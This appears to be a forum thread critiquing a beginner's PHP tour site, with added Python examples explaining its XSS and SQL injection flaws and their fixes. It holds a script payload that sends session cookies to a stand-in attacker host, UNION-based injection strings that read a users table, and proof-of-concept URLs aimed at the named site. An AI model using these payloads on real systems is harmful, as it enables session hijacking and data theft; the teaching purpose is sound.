First major Site..
[Posted under old name]
Last edited by Zoxive on Wed Sep 09, 2009 11:08 pm, edited 2 times in total.
You are susceptible to XSS:
http://www.batechcentral.com/NTS_am/2/p ... /script%3E
jshpro2 wrote:
You are susceptible to XSS:
http://www.batechcentral.com/NTS_am/2/p ... /script%3E

What's this? Never heard of it.. too bad I can't fix it... the due date was the 1st..
-NSF
jshpro2 wrote:
cross site scripting.
It means I can log in as the admin if I get you to load a specially constructed URL; if you were logged in as the admin it could cause JavaScript to send me your login cookie.

Login session? I don't have cookies..
And I Wikied it, but didn't get much from it other than cross site scripting, and that it was mainly used to crack sites..
-NSF
- John Cartwright (Site Admin)
Jcart wrote:
As in I could capture your session cookie, and potentially gain access/permission to the admin section as long as an admin logged in while I had this attack set up.. could also steal anyone's account that logged in as well.

Ok, well beyond that.. it's my first site...... ;(
And I just started PHP when I first joined.
So anything about the site? I was very happy with it.. till now.. :/
-NSF
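To make concrete what jshpro2 and Jcart describe above (a parameter reflected into the page carrying script that ships the session cookie off-site), here is an added example; it is not code from the site or from anyone in this thread. The host, page and parameter name in the URL are made up, since the real vulnerable URL is truncated above. It renders the reflected value once unescaped and once escaped the way htmlspecialchars() with ENT_QUOTES would do in PHP, and checks the cookie attribute that decides whether document.cookie can read the session cookie at all.

```python
import html
from urllib.parse import parse_qs, urlparse

# Constructed attacker URL (hypothetical host, page and parameter name; the real
# vulnerable URL is not reproduced here). The q value decodes to:
#   <script>document.location='http://attacker.invalid/?c='+document.cookie</script>
# i.e. a script that sends the victim's cookies to the attacker's server.
ATTACK_URL = (
    "http://www.example.invalid/page.php?q="
    "%3Cscript%3Edocument.location%3D%27http%3A//attacker.invalid/%3Fc%3D%27"
    "%2Bdocument.cookie%3C/script%3E"
)


def reflected_param(url: str, name: str = "q") -> str:
    """Return the decoded query parameter the page is about to echo back."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(q: str) -> str:
    """Echoes user input straight into HTML: the browser runs the injected script."""
    return f"<p>Results for {q}</p>"


def render_fixed(q: str) -> str:
    """Escapes <, >, &, ' and " so the input is displayed as text, never parsed as
    markup. Python equivalent of htmlspecialchars($q, ENT_QUOTES) in PHP."""
    return f"<p>Results for {html.escape(q, quote=True)}</p>"


def contains_script_tag(page_html: str) -> bool:
    """Cheap check used here to show the difference; a real test loads the page in a browser."""
    return "<script" in page_html.lower()


# Cookie attributes matter too: HttpOnly keeps document.cookie from reading the
# session cookie, which blocks this particular theft (but not other actions an
# injected script can take with the victim's session, such as sending requests).
SESSION_COOKIE_WEAK = "sessid=abc123; Path=/"
SESSION_COOKIE_HARDENED = "sessid=abc123; Path=/; HttpOnly; Secure"


def cookie_readable_by_script(set_cookie_value: str) -> bool:
    """True when the cookie lacks HttpOnly and is exposed through document.cookie."""
    attrs = {a.strip().lower() for a in set_cookie_value.split(";")[1:]}
    return "httponly" not in attrs


if __name__ == "__main__":
    payload = reflected_param(ATTACK_URL)
    print("vulnerable:", render_vulnerable(payload))
    print("fixed:     ", render_fixed(payload))
    print("weak cookie readable:", cookie_readable_by_script(SESSION_COOKIE_WEAK))
```

Escaping on output is the fix; the HttpOnly flag is a second layer that limits what a successful injection can steal, not a substitute for the escaping.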
NonStopableForce wrote:
So anything about the site? I was very happy with it.. till now.. :/
-NSF

- Invalid CSS
- Help/Sitemap/Adv search hard to read, could be in the main nav bar, not spaced well/consistently
- At least four different fonts on the page (including images), could be fewer
- Have to click About Us to learn anything about NTS. Will destroy your Google ratings. At least have some intro text on the main page
- Very nice use of a consistent color scheme (blue/brown/green), although I prefer fewer colors.
- Cross-site scripting vulnerable
Overall, not bad, but not great.
- benamaster (Forum Newbie)
I have to say I like the features on the http://www.batechcentral.com/ntspm quite a bit better compared to the http://www.batechcentral.com/nts_am/2/
The http://www.batechcentral.com/ntspm site has much better features as you can select a date via a calendar and they list sites in the city and the tours that go to those sites.
Roja wrote:
- Invalid CSS

If you notice, I didn't realize you couldn't use // to comment out; that's why it doesn't validate... and it's after the 1st so I can't fix it.
benamaster wrote:
I have to say I like the features on the http://www.batechcentral.com/ntspm quite a bit better compared to the http://www.batechcentral.com/nts_am/2/
The http://www.batechcentral.com/ntspm site has much better features as you can select a date via a calendar and they list sites in the city and the tours that go to those sites.

Ok, you think that because you made it?
But what does everyone else think?
-NSF
Are we the judges on this competition and we don't even know it?
The "enemy"'s site:
- when I page to a new month on the calendar it scrolls me to the top of the page; perhaps use of anchors to scroll the page back to where I was would be appropriate, or a simple ajax / iframe solution to avoid that issue altogether
- The elements on the bottom of the tour pages are not arranged in a logical way: I have tabs to read reviews, see a calendar, an area to rate the tour, etc.. all cluttered into one area.
- links in upper right are in a non-standard place, and do not stand out.
+ fluid layout, I can resize / change font size
- sql injection on http://www.batechcentral.com/ntspm/Prod ... ProductID= ????

As for your site, it has sql injection here:
http://www.batechcentral.com/NTS_am/2/tours.php?tour=
(this gives me the ability to run any query I want, with very few limitations on what I can run)
Regarding the sql injection, just to prevent confusion: you are adding slashes or escaping the string, but this does you no good because you're running the input like so:
Code: Select all
select `whatever` from `table` where `id` = $id
Since $id has no single quotes around it in your query I can insert things.
Proof of concept -
http://www.batechcentral.com/NTS_am/2/t ... r%205=5%20;
I'm just selecting, but I'm doing it through the SQL injection vulnerability.
jshpro2 wrote:
As for your site, it has sql injection here:
http://www.batechcentral.com/NTS_am/2/tours.php?tour=
(this gives me the ability to run any query I want, with very few limitations on what I can run)
Regarding the sql injection, just to prevent confusion: you are adding slashes or escaping the string, but this does you no good because you're running the input like so:
Code: Select all
select `whatever` from `table` where `id` = $id
Since $id has no single quotes around it in your query I can insert things.
Proof of concept -
http://www.batechcentral.com/NTS_am/2/t ... r%205=5%20;
I'm just selecting, but I'm doing it through the SQL injection vulnerability.

Mm, I just tried messing with that, and every time it would bring up tour id 28, with 5=5 or anything=anything.
There isn't much they could do with that, but yes I know it's bad, and I'll take account of all these mess-ups for future websites..
-NSF
- benamaster (Forum Newbie)
We should all make a vote!
Thought with this being a PHP site and my site being in ASP.NET 2.0 I am pretty sure who would win out. I have done PHP before and I do like it but its alot easier I think to manage a project in Visual Studio 2005.
For my personal site I use PHP, does anyone have suggestions of a Visual Studio like program that would be better than Dreamweaver 8?
- feyd (Neighborhood Spidermoddy)
My vote: you're all off the island for failing to face your fears with big brother and your fellow geeks watching on.
No ASP vs PHP war.
Check out vs.PHP (I think that's the name) .. or PHP Designer.. Happily, most decent code editors are better than Dreamweaver. If you have any further, off topic things to ask, like editor questions, look around the forums. There is a VERY large editors thread.
NonStopableForce wrote:
There isn't much they could do with that

Wrong, here's another example:
http://www.batechcentral.com/NTS_am/2/t ... d%20=%2033
I imagine the query I just made looks like
Code: Select all
select `field`, `field` from `some_table` where `id` = 0 or id = 33 order by `field`
Now what if I knew the schema of your tables and ran the following query
Code: Select all
select `field`, `field` from `some_table` where `id` = 0 or id = 33 union all select 'dummy_data', `password` from `users` where `username` = 'admin' ; -- order by `field`
Obviously that's not a valid query on your system, but if I was motivated enough I could select data from any of your tables with this exploit; who knows what other exploits I could find if I had the time / will to seek them all out (i.e., maybe you have an sql injection vulnerability somewhere else where I could delete from tables).
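jshpro2's two posts above (the unquoted `$id` in `where id = $id`, the `5=5` and `0 or id = 33` proofs of concept, and the UNION query against a users table) are reproduced below as an added, runnable example. It is not code from the site or from anyone in this thread: it uses SQLite from Python instead of PHP/MySQL, a constructed schema (tables `tours` and `users` with sample rows) that is only an assumption about what such a site might store, and a PHP-style addslashes() to show why escaping does nothing when the value is not inside quotes. It goes one step beyond the thread by showing the two fixes, an integer cast and a parameterized query, and by using a UNION payload that contains no quote characters, which is what an attacker would do against addslashes().

```python
import sqlite3

# Constructed schema and rows: an assumption about what a tour-booking site stores.
SCHEMA = """
CREATE TABLE tours (id INTEGER PRIMARY KEY, name TEXT, price TEXT);
INSERT INTO tours VALUES (28, 'Harbour walk', '20'), (33, 'Night bus', '35');
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret-hash');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def addslashes(s: str) -> str:
    """PHP addslashes(): escapes quotes and backslashes. It only protects a value
    that ends up inside a quoted string literal in the SQL."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def tours_vulnerable(conn, tour: str):
    """Mirrors the query from the thread: the escaped value is pasted into the SQL
    with no quotes around it, so anything that is valid SQL after `id =` runs."""
    sql = (
        "select `name`, `price` from `tours` where `id` = "
        + addslashes(tour)
        + " order by `name`"
    )
    return conn.execute(sql).fetchall()


def tours_cast(conn, tour: str):
    """Cheapest fix for a numeric id, (int)$_GET['tour'] in PHP: non-numeric input
    is rejected before it reaches the query string."""
    try:
        tour_id = int(tour)
    except ValueError:
        return []
    return conn.execute(
        f"select `name`, `price` from `tours` where `id` = {tour_id} order by `name`"
    ).fetchall()


def tours_safe(conn, tour: str):
    """General fix: a parameterized query. The value is bound by the driver and is
    never parsed as SQL, whatever characters it contains."""
    return conn.execute(
        "select `name`, `price` from `tours` where `id` = ? order by `name`", (tour,)
    ).fetchall()


# Payloads as an attacker would type them into ?tour= (constructed for this example).
PAYLOAD_TAUTOLOGY = "28 or 5=5"        # every row comes back; the page shows the first
PAYLOAD_OTHER_ROW = "0 or id = 33"     # a row the caller never asked for
# UNION with no quote characters, so addslashes() has nothing to escape. The second
# SELECT must return the same number of columns as the first (two here).
PAYLOAD_UNION = "0 or id = 33 union all select username, password from users"


if __name__ == "__main__":
    db = build_db()
    for payload in (PAYLOAD_TAUTOLOGY, PAYLOAD_OTHER_ROW, PAYLOAD_UNION):
        print("vulnerable", repr(payload), "->", tours_vulnerable(db, payload))
        print("cast      ", repr(payload), "->", tours_cast(db, payload))
        print("safe      ", repr(payload), "->", tours_safe(db, payload))
```

The tautology payload is the `5=5` case NSF tried: the query matches every tour, and a page that only displays the first row will keep showing tour 28, which is why it looked harmless. The UNION payload shows what jshpro2 meant by selecting from any table: the admin password column lands in the same result set the tours page renders. Note that the `; --` in jshpro2's sketch needs stacked-query support, which most PHP/MySQL drivers of that era did not allow; the UNION form above needs no second statement at all.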